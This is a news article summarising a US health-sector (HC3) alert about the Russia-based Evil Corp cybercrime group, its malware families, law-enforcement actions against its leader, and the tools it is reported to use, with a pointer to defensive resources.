The Health Sector Cybersecurity Coordination Center (HC3) is alerting the healthcare and public health sector (HPH) regarding one of the ablest and hostile cybercrime syndicates presently active – Evil Corp. The group works from Russia and has been in business since around 2009 and is behind the well-known Dridex banking Trojan and a number of other malware and ransomware variants, such as Hades, BitPaymer, SocGholish, Phoenixlocker, WastedLocker, JabberZeus, and GameOver Zeus. Evil Corp’s malware and ransomware variants were utilized in numerous cyberattacks on the HPH sector. The BitPaymer ransomware attack in 2017 that happened on the National Health Service (NHS) Lanarkshire Board in Scotland was the most popular.
Evil Corp’s principal strategy in recent years is doing digital extortion attacks, which include using ransomware and stealing sensitive data. HC3 states that Evil Corp cooperates with the Russian intelligence agencies and may carry out attacks requested by the Russian government. The group gets access to a number of third-party malware variants, such as the TrickBot and Emotet Trojans, and connects with leading ransomware and cybercriminal operations around the world.
Evil Corp has become the topic of several law enforcement campaigns. A Federal grand jury indicted the head of Evil Corp, Maksim Yakubets, in 2019 and was accused of computer hacking, conspiracy, bank fraud and wire fraud associated with the spread of Bugat malware, the forerunner of Dridex. Besides managing the operation, Yakubets interacts with the Russian government and is recognized to have been assigned to projects for the Russin FSB. A number of other high-ranking group members have likewise been discovered and are presently being searched by the FBI and other law enforcement bureaus.
The group is greatly dependent on money mules for getting payments from its victims, and about 8 Moscow-based persons are seen to have worked as the group’s financial facilitators and are engaged in transferring the profits from the attacks to keep the law enforcement from tracing the money.
Because the Evil Group has a number of malware and ransomware variants, they use them for a wide variety of tactics, techniques, and procedures during their attacks. They likewise have considerable technical features, both in-house and by means of connections with other cybercriminal campaigns. Phishing is one of the primary techniques employed to obtain initial access to the networks of victims. The group is additionally identified to employ legit security tools as well as living-of-the-land strategies to elude security tools and work undiscovered, which include publicly accessible tools like Covenant, Cobalt Strike, Donut, MimiKatz, Kodiac, PowerSploit, and PowerShell Empire, together with a lot of self-developed resources.
Because of the comprehensive variety of malware and ransomware variants and customized tools employed by the group, several protective measures and mitigations are needed to identify and prohibit attacks. HC3 has mentioned a number of resources in the notification https://www.hhs.gov/sites/default/files/evil-corp-threat-profile.pdf to enable network defenders to strengthen their defenses, together with Yara rules, indicators of compromise, and other protective data.